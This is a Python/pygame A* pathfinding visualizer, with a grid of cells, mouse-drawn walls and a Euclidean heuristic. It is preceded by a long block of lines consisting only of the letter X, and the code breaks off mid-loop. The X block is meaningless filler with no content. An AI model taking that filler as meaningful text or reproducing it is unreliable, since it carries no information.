XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXX |
import pygame,sys,math
# Color constants (RGB triples used when drawing cells)
WHITE = 255, 255, 255
BLACK = 0, 0, 0
LIGHT_BLUE = 25, 120, 250
RED = 255, 0, 0
GREEN = 0, 255, 0
# Board geometry: a rows x cols grid of square tiles, tile_size pixels each
rows, cols = 50, 50
tile_size = 12
window_width, window_height = cols*tile_size, rows*tile_size
# Pygame setup: create the main window and the frame clock
pygame.init()
win = pygame.display.set_mode((window_width, window_height))
clock = pygame.time.Clock()
class Spot:
    """A single grid cell used by the A* search.

    Holds the cell's position, its A* scores (f = g + h), a back-pointer
    for path reconstruction and a wall flag.
    """

    def __init__(self, x, y):
        self.x = x
        self.y = y
        # A* bookkeeping: total, cost-so-far and heuristic scores
        self.f = 0
        self.g = 0
        self.h = 0
        self.neighbors = []   # adjacent Spot objects (filled by add_neighbors)
        self.prev = None      # back-pointer set during the search
        self.wall = False     # True when this cell is an obstacle

    def show(self, win, color):
        """Draw this cell as a square, one pixel short of tile_size for grid lines."""
        rect = (self.x * tile_size, self.y * tile_size, tile_size - 1, tile_size - 1)
        pygame.draw.rect(win, color, rect)

    def add_neighbors(self, grid):
        """Collect the up-to-8 in-bounds cells surrounding this one."""
        offsets = ((1, -1), (1, 0), (1, 1), (0, -1),
                   (0, 1), (-1, -1), (-1, 0), (-1, 1))
        for dx, dy in offsets:
            nx, ny = self.x + dx, self.y + dy
            if 0 <= nx < cols and 0 <= ny < rows:
                self.neighbors.append(grid[nx][ny])
def clickWall(pos, state):
    """Set the wall flag of the tile under pixel *pos* to *state*.

    The start and end tiles are never turned into walls.
    """
    col, row = pos[0] // tile_size, pos[1] // tile_size
    tile = grid[col][row]
    if tile is not start and tile is not end:
        tile.wall = state
def euclidean(a, b):
    """Return the Euclidean (straight-line) distance between two cells.

    Used as the A* heuristic; *a* and *b* only need ``x``/``y`` attributes.
    ``math.hypot`` (the module is already imported at the top of the file)
    is preferred over ``(dx**2 + dy**2) ** 0.5``: it is the idiomatic form
    and avoids intermediate overflow/underflow for extreme inputs.
    """
    return math.hypot(a.x - b.x, a.y - b.y)
# Build the 2-D board: grid[col][row] holds one Spot per cell.
grid = [[Spot(col, row) for row in range(rows)] for col in range(cols)]
# Wire up each cell's neighbor list now that the whole grid exists.
for column_of_spots in grid:
    for spot in column_of_spots:
        spot.add_neighbors(grid)
# Search endpoints: start in the top-left corner, end roughly 3/4 of the way in.
start = grid[0][0]
end = grid[cols - cols//4][rows - rows//4]
openSet = [start]   # frontier of cells still to be evaluated
closeSet = []       # cells already evaluated
path = []           # final route, filled once the end is reached
def main():
    """Run the interactive A* demo.

    Left/right click (or drag) adds/removes walls; pressing Return starts
    the search. The found path is drawn in light blue; if the open set
    empties first there is no solution and the loop exits.
    """
    processing = False
    while True:
        '''
        Event handler for drawing the obstacles and starting the algorithm
        '''
        for event in pygame.event.get(): # All events (mouse moving, button clicks, mouse clicks etc)
            if event.type == pygame.QUIT: # If they try to close the window
                pygame.quit()
                sys.exit()
            elif event.type == pygame.MOUSEBUTTONDOWN: # If they press the mouse (any button)
                if event.button in (1, 3): # And it's a left or right click
                    clickWall(pygame.mouse.get_pos(), event.button==1) # Click a wall with either (True as a left click or False as not a left click (a right click)
            elif event.type == pygame.MOUSEMOTION:
                # event.buttons is a tuple of (x, y, z) e.g. (1, 0, 0) if they're holding a button, x = left click, y = middle and z = right click
                if event.buttons[0] or event.buttons[2]: # If they're holding left or right click while dragging the mouse
                    clickWall(pygame.mouse.get_pos(), event.buttons[0]) # if the left click is being held, send True, else False (Right click)
            elif event.type == pygame.KEYDOWN and event.key == pygame.K_RETURN: #When return key is pressed
                processing = True
        '''
        When we begin (Return)
        '''
        if processing:
            if len(openSet) > 0:
                # Expand the open-set node with the lowest f-score (A* ordering)
                current = min(openSet, key = lambda x: x.f)
                if current == end: # If we've found the end
                    temp = current
                    while temp.prev: # Working backwards from the end
                        path.append(temp.prev)
                        temp = temp.prev
                    # Once we've tracked from the end to the start, and built the path
                    processing = False
                    print("Solution found")
                if processing:
                    openSet.remove(current)
                    closeSet.append(current)
                    # Move the current tile from the open set to the closed set
                    for neighbor in current.neighbors:
                        if neighbor not in closeSet and not neighbor.wall:
                            tempG = current.g + 1  # uniform step cost (diagonals included)
                            newPath = False
                            if neighbor in openSet:
                                if tempG < neighbor.g:
                                    neighbor.g = tempG
